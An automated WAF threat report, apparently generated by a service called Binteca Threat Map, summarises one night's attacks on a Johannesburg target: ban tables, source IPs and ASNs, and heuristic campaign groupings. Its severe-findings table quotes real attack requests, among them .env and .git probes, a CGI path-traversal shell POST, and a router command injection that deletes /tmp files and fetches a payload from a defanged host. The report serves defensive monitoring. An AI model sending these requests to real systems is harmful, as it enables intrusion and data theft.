# Binteca Threat Map: night ending 2026-10-04

Window: 2026-10-03T18:00:00+02:00 to 2026-10-04T06:00:00+02:00 (UTC+02:00). Target point: Johannesburg, ZA.

## Totals

| Metric | Overnight |
|---|---:|
| Attacks at the edge | 1,157 |
| New bans at the edge | 36 |
| Attacks (all sensors) | 1,508 |
| New bans (all sensors) | 70 |
| Requests seen | 81,725 |
| Blocked at the edge | 439 |
| Active bans at report time | 27 |
| Sensors reporting | 5 |

| Sensor | Kind | Attacks | New bans | Active bans |
|---|---|---:|---:|---:|
| edge | edge | 1,157 | 36 | 21 |
| web-1 | web | 192 | 9 | 2 |
| web-2 | web | 54 | 8 | 0 |
| web-3 | web | 51 | 7 | 2 |
| web-4 | web | 54 | 10 | 2 |

## Attack categories

| Category | Attacks |
|---|---:|
| cms-probe | 1,071 |
| secret-probe | 340 |
| protocol | 40 |
| scanner | 27 |
| code-injection | 26 |
| behaviour | 2 |

## Banned identifiers

- IP addresses banned: **63** (70 ban actions)
- E-mail addresses banned: 0
- Other identifiers banned: 0
- The WAF bans network addresses only; no e-mail or account identifiers appear in the source.

| IP | Country | City | ASN / org | Attack types | Bans | Max offence | State | Tags | Suspected actor (confidence) |
|---|---|---|---|---|---:|---:|---|---|---|
| `213.209.159.84` | DE | Augsburg | AS208137 Feo Prest SRL | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `195.178.110.28` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting | Suspected credential/secret-harvesting campaign (medium) |
| `130.12.180.117` | NL | Amsterdam | AS202412 Omegatech LTD | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Suspected credential/secret-harvesting campaign (medium) |
| `193.32.204.199` | TR | Istanbul | AS153622 Madina IT | secret-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `43.163.90.125` | SG | Singapore | AS132203 Shenzhen Tencent Computer Systems Company Limited | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `45.138.12.45` | HK | Sheung Wan | AS218785 TC DATACENTER LIMITED | cms-probe | 1 | 2 | expired | abuse-prone-hosting, repeat-offender, cluster:45.138.12.0/24 | Known-bad scanning infrastructure (medium) |
| `139.28.219.70` | GB | London | AS9009 M247 Europe SRL | cms-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `143.244.57.92` | FR | Paris | AS60068 Datacamp Limited | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `146.70.194.222` | FR | Saint-Denis | AS9009 M247 Europe SRL | cms-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `45.146.55.115` | US | Memphis | AS62240 Clouvider Limited | cms-probe | 1 | 1 | active |  | Suspected CMS exploitation bot (low) |
| `82.102.18.222` | FR | Saint-Denis | AS9009 M247 Europe SRL | cms-probe | 1 | 1 | expired | hosting-provider | Suspected CMS exploitation bot (low) |
| `91.193.232.116` | US | Memphis | AS62240 Clouvider Limited | cms-probe | 1 | 1 | active | cluster:91.193.232.0/24 | Suspected CMS exploitation bot (medium) |
| `45.153.102.164` | IE | Bagenalstown | AS203020 HostRoyale Technologies Pvt Ltd | secret-probe | 2 | 3 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `34.28.187.158` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `91.92.242.37` | NL | Amsterdam | AS202412 Omegatech LTD | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1 | Suspected credential/secret-harvesting campaign (medium) |
| `103.46.186.85` | ID | Utan | AS150462 PT Air Lintas Komunikasi | rce-payload | 1 | 1 | expired | cluster:103.46.186.0/24 | Suspected Mirai-style IoT botnet (medium) |
| `102.220.161.139` | SI | Ljubljana | AS197769 VPS Dedicated LLC | secret-probe | 2 | 1 | expired | spamhaus-drop, firehol-level1, hosting-provider, cluster:102.220.161.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `102.220.161.87` | SI | Ljubljana | AS197769 VPS Dedicated LLC | secret-probe | 2 | 1 | expired | spamhaus-drop, firehol-level1, hosting-provider, cluster:102.220.161.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `103.46.186.148` | ID | Utan | AS150462 PT Air Lintas Komunikasi | rce-payload | 2 | 1 | expired | cluster:103.46.186.0/24 | Suspected Mirai-style IoT botnet (medium) |
| `104.194.155.42` | SG | Singapore | AS14956 RouterHosting LLC | secret-probe | 2 | 2 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `193.32.162.155` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 2 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:193.32.162.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `45.45.237.97` | US | Chicago | AS400529 Infraly, LLC | secret-probe | 2 | 2 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `103.189.178.93` | IN | Hyderabad (Srinivasa Nagar) | AS149593 City Online Media Private Ltd | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `103.59.161.219` | ID | Kediri | AS150493 PT Gunung Sedayu Sentosa | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `103.74.21.89` | PK | Hub | AS139879 Galaxy Broadband (pvt.) Ltd. | command-injection | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `111.90.180.172` | KH | Phnom Penh | AS38235 Angkor Data Communication | credential-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `134.199.157.29` | AU | Alexandria | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `154.202.66.141` | SG | Singapore | AS135377 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `154.54.100.190` | US | Beltsville | AS6405 American Information Network | secret-probe | 1 | 3 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `161.132.49.125` | PE | Llama | AS3132 Red Cientifica Peruana | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `167.71.175.236` | US | Clifton | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `170.64.131.170` | AU | Alexandria | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | active | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `170.64.214.139` | AU | Alexandria | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `172.68.183.22` | SE | Stockholm | AS13335 Cloudflare, Inc. | secret-probe | 1 | 1 | expired | cdn-edge | CDN edge relaying an attack (true origin hidden) (high) |
| `173.239.213.16` | US | Atlanta | AS62240 Clouvider Limited | cms-probe | 1 | 1 | active |  | Suspected CMS exploitation bot (low) |
| `178.128.151.198` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `185.221.237.197` | DE | Frankfurt am Main | AS212552 BitCommand LLC | rce-payload | 1 | 1 | expired |  | Suspected exploit/RCE bot (low) |
| `192.241.132.217` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `192.3.245.183` | US | Los Angeles | AS36352 HostPapa | rce-payload | 1 | 1 | expired |  | Suspected Mirai-style IoT botnet (medium) |
| `193.32.162.156` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:193.32.162.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `193.32.162.157` | NL | Amsterdam | AS47890 UNMANAGED LTD | secret-probe | 1 | 1 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, cluster:193.32.162.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `196.189.236.67` | ET | Addis Ababa | AS24757 EthioNet | rce-payload | 1 | 1 | active |  | Suspected exploit/RCE bot (low) |
| `20.210.186.186` | JP | Osaka | AS8075 Microsoft Corporation | php-probe | 1 | 3 | active | hosting-provider, repeat-offender | Suspected CMS exploitation bot (low) |
| `20.65.144.90` | US | San Antonio | AS8075 Microsoft Corporation | attack-tool | 1 | 1 | expired | hosting-provider | Automated attack tool (low) |
| `20.65.171.30` | US | San Antonio | AS8075 Microsoft Corporation | attack-tool | 1 | 1 | expired | hosting-provider | Automated attack tool (low) |
| `20.65.217.174` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `206.189.225.181` | US | North Bergen | AS14061 DigitalOcean, LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `216.218.206.66` | US | San Ramon | AS6939 Hurricane Electric LLC | secret-probe | 1 | 1 | expired | research-scanner | Internet research scanner (benign) (high) |
| `23.234.72.92` | US | Los Angeles | AS11878 tzulo, inc. | secret-probe | 1 | 2 | expired | repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `34.31.120.130` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 2 | expired | hosting-provider, repeat-offender | Suspected credential/secret-harvesting campaign (low) |
| `35.238.129.244` | US | Council Bluffs | AS396982 Google LLC | secret-probe | 1 | 1 | expired | hosting-provider | Suspected credential/secret-harvesting campaign (low) |
| `40.74.212.136` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `45.148.10.95` | AD | Andorra la Vella | AS48090 TECHOFF SRV LIMITED | secret-probe | 1 | 2 | expired | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender | Suspected credential/secret-harvesting campaign (medium) |
| `52.248.42.25` | US | San Antonio | AS8075 Microsoft Corporation | rce-payload | 1 | 1 | expired | hosting-provider | Suspected exploit/RCE bot (low) |
| `82.197.69.56` | SG | Singapore | AS141995 Contabo Asia Private Limited | cms-probe | 1 | 3 | active | hosting-provider, repeat-offender | Suspected CMS exploitation bot (low) |
| `84.233.199.151` | US | New York | AS212238 Datacamp Limited | secret-probe, credential-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `85.204.70.94` | FR | Paris | AS25369 Hydra Communications Ltd | cms-probe | 1 | 1 | expired |  | Suspected CMS exploitation bot (low) |
| `91.148.244.131` | NL | Haarlem (Oude Stad) | AS34343 Eweka Internet Services B.V. | credential-probe | 1 | 1 | expired |  | Suspected credential/secret-harvesting campaign (low) |
| `91.193.232.178` | US | Memphis | AS62240 Clouvider Limited | cms-probe | 1 | 1 | active | cluster:91.193.232.0/24 | Suspected CMS exploitation bot (medium) |
| `94.154.43.125` | NL | Amsterdam | AS219502 Storm Industries LLC | secret-probe | 1 | 2 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:94.154.43.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `94.154.43.129` | NL | Amsterdam | AS219502 Storm Industries LLC | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:94.154.43.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `94.154.43.84` | NL | Amsterdam | AS219502 Storm Industries LLC | secret-probe | 1 | 3 | active | spamhaus-drop, firehol-level1, abuse-prone-hosting, repeat-offender, cluster:94.154.43.0/24 | Suspected credential/secret-harvesting campaign (medium) |
| `96.126.130.210` | JP | Osaka | AS149440 Evoxt Sdn. Bhd. | secret-probe | 1 | 3 | active | repeat-offender | Suspected credential/secret-harvesting campaign (low) |

## Top sources by request count

| IP | Requests | Country | ASN / org | Status |
|---|---:|---|---|---|
| `20.219.185.206` | 95 | IN | AS8075 Microsoft Corporation | banned until Sun 07:01 |
| `34.52.229.253` | 76 | BE | AS396982 Google LLC | spared: shared address |
| `213.209.159.84` | 72 | DE | AS208137 Feo Prest SRL | banned until Sun 23:53 |
| `195.178.110.28` | 71 | AD | AS48090 TECHOFF SRV LIMITED | ban expired 22:37 |
| `45.138.12.44` | 17 | HK | AS218785 TC DATACENTER LIMITED | spared: shared address |
| `45.156.87.186` | 12 | NL | AS197170 TechTies Inc. | spared: shared address |
| `130.12.180.117` | 11 | NL | AS202412 Omegatech LTD | ban expired 05:23 |
| `193.32.204.199` | 9 | TR | AS153622 Madina IT | ban expired 22:39 |
| `43.163.90.125` | 9 | SG | AS132203 Shenzhen Tencent Computer Systems Company Limited | ban expired 03:55 |
| `45.138.12.45` | 6 | HK | AS218785 TC DATACENTER LIMITED | ban expired 03:48 |
| `38.248.19.54` | 6 | ID | AS141983 PT Rajeg Media Telekomunikasi | not banned |
| `139.28.219.70` | 5 | GB | AS9009 M247 Europe SRL | ban expired 20:41 |
| `143.244.57.92` | 5 | FR | AS60068 Datacamp Limited | ban expired 21:34 |
| `146.70.194.222` | 5 | FR | AS9009 M247 Europe SRL | ban expired 21:28 |
| `45.146.55.115` | 5 | US | AS62240 Clouvider Limited | banned until Sun 06:54 |
| `82.102.18.222` | 5 | FR | AS9009 M247 Europe SRL | ban expired 22:52 |
| `91.193.232.116` | 5 | US | AS62240 Clouvider Limited | banned until Sun 06:54 |
| `45.153.102.164` | 3 | IE | AS203020 HostRoyale Technologies Pvt Ltd | ban expired 01:33 |
| `34.28.187.158` | 3 | US | AS396982 Google LLC | ban expired 22:52 |
| `91.92.242.37` | 3 | NL | AS202412 Omegatech LTD | ban expired 19:24 |
| `103.46.186.85` | 2 | ID | AS150462 PT Air Lintas Komunikasi | ban expired 20:29 |

## Most severe findings

| Severity | Rule | Requests | Addresses | First | Example source | Example request |
|---|---|---:|---:|---|---|---|
| critical | Secret or VCS file probe (BW-SEC-01) | 198 | 29 | 18:32 | `45.153.102.164` | `GET /.env` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 33 | 5 | 23:06 | `84.233.199.151` | `GET /db.sql` |
| critical | PHP or shell payload (BW-RCE-03) | 6 | 3 | 22:31 | `103.46.186.148` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 77 | 5 | 18:28 | `45.156.87.186` | `GET /.git/config` |
| critical | Credential, state or dump file probe (BW-SEC-02) | 2 | 1 | 18:28 | `45.156.87.186` | `GET /wp-config.php` |
| critical | PHP or shell payload (BW-RCE-03) | 1 | 1 | 01:29 | `52.248.42.25` | `GET /autodiscover/autodiscover.json?[[[@]]]zdi/Powershell` |
| critical | PHP or shell payload (BW-RCE-03) | 1 | 1 | 23:27 | `192.3.245.183` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 1 | 1 | 02:09 | `102.220.161.87` | `GET /.git/config` |
| critical | Secret or VCS file probe (BW-SEC-01) | 14 | 4 | 18:24 | `91.92.242.37` | `GET /.env` |
| critical | PHP or shell payload (BW-RCE-03) | 4 | 3 | 19:29 | `103.46.186.85` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Secret or VCS file probe (BW-SEC-01) | 15 | 3 | 00:08 | `104.194.155.42` | `GET /.git/config` |
| critical | PHP or shell payload (BW-RCE-03) | 13 | 4 | 00:23 | `103.46.186.148` | `POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh` |
| critical | Shell command injection (BW-RCE-02) | 1 | 1 | 01:46 | `103.74.21.89` | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//172.168.171.61:…` |
| high | Run of missing-page requests (BW-BEH-01) | 2 | 2 | 03:37 | `34.52.229.253` | `GET /credentials` |
| high | Attack tool user agent (BW-UA-01) | 2 | 2 | 21:52 | `187.108.1.142` | `GET /` |
| high | Attack tool user agent (BW-UA-01) | 20 | 9 | 18:02 | `n/a` | `GET /` |
| high | Attack tool user agent (BW-UA-01) | 1 | 1 | 18:17 | `74.249.190.122` | `GET /` |
| high | Attack tool user agent (BW-UA-01) | 4 | 4 | 18:15 | `20.83.164.196` | `GET /` |
| high | Attack tool user agent (BW-UA-01) | 2 | 2 | 02:01 | `172.202.106.160` | `POST /mcp` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 55 | 8 | 23:16 | `139.28.219.70` | `GET //wp-includes/wlwmanifest.xml` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 38 | 10 | 19:19 | `144.48.130.71` | `POST /HNAP1/` |
| medium | PHP script probe (BW-PHP-01) | 7 | 7 | 18:35 | `103.146.203.111` | `GET /admin/config.php` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 21 | 4 | 19:28 | `45.156.128.101` | `GET /owa/` |
| medium | PHP script probe (BW-PHP-01) | 5 | 4 | 19:31 | `45.156.128.104` | `GET /owncloud/status.php` |
| medium | CMS, admin or appliance probe (BW-CMS-01) | 10 | 2 | 05:53 | `91.193.232.116` | `GET //wp-includes/ID3/license.txt` |

## Indicators from payloads (defanged)

| Indicator | Port | Kind | Context | Seen from |
|---|---|---|---|---|
| `172[.]168[.]171[.]61` |  | payload-download-host | Shell command injection payload fetches / | `103.74.21.89` |

## Suspected actors and campaigns

Labels are heuristic groupings of infrastructure and behaviour, **not attribution**. See the README.

| Suspected actor / campaign | Confidence | Addresses | Top countries | Evidence |
|---|---|---:|---|---|
| Suspected credential/secret-harvesting campaign | medium | 33 | NL 10, US 9, AU 3, AD 2, SI 2 | hunts for .env, VCS or credential files; listed on Spamhaus DROP; listed on FireHOL level 1; AS47890 UNMANAGED LTD (abuse-prone hosting) |
| Suspected CMS exploitation bot | medium | 15 | FR 4, US 4, ID 2, GB 1, IN 1 | CMS, admin panel or PHP script probing; 2 addresses from 91.193.232.0/24 (AS62240) attacked the same night |
| Suspected exploit/RCE bot | low | 8 | US 3, SG 2, PE 1, DE 1, ET 1 | sent a shell or PHP payload |
| Automated attack tool | low | 6 | US 5, BR 1 | request carried a known attack-tool user agent |
| Internet research scanner (benign) | high | 5 | US 3, NL 2 | reverse DNS ca7e79b6df.scan.leakix.org; reverse DNS c8021b81a5.scan.leakix.org; reverse DNS scan-05.shadowserver.io; reverse DNS sh-ams-nl-gp6-wk105a.internet-census.org |
| Suspected Mirai-style IoT botnet | medium | 4 | ID 2, PK 1, US 1 | IoT/router exploit path with a downloader typical of Mirai-family loaders; 2 addresses from 103.46.186.0/24 (AS150462) attacked the same night |
| Unattributed automated probe | low | 2 | IN 1, ID 1 |  |
| Known-bad scanning infrastructure | medium | 2 | HK 2 | AS218785 TC DATACENTER (abuse-prone hosting); 2 addresses from 45.138.12.0/24 (AS218785) attacked the same night |
| CDN edge relaying an attack (true origin hidden) | high | 1 | SE 1 | AS13335 Cloudflare is a CDN; the real client is behind it |

_Binteca Threat Map (https://cybermap.binteca.io), generated 2026-10-07T11:35:12Z from the overnight WAF summary. Geolocation: DB-IP Lite (CC BY 4.0)._
